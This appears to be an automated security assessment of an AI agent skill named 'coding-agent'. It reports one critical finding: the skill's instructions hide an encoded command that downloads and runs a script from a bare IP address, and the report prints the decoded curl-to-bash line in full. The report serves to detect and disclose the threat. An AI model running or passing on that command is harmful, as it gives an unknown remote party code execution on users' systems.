Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution via Untrusted Script Download.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (1)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Remote Code Execution via Untrusted Script Download.** The skill instructs macOS users to execute a command that downloads and runs a script from an arbitrary, untrusted IP address (91.92.242.30). This allows for arbitrary remote code execution on the user's system, posing a severe supply chain risk and command injection vulnerability. The base64 decoded command is: `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. Remove the instruction to download and execute a script from an untrusted external IP address. Provide a secure, verifiable installation method, such as a package manager, a signed installer, or a script hosted on a trusted domain with clear content review. | LLM | SKILL.md:12 |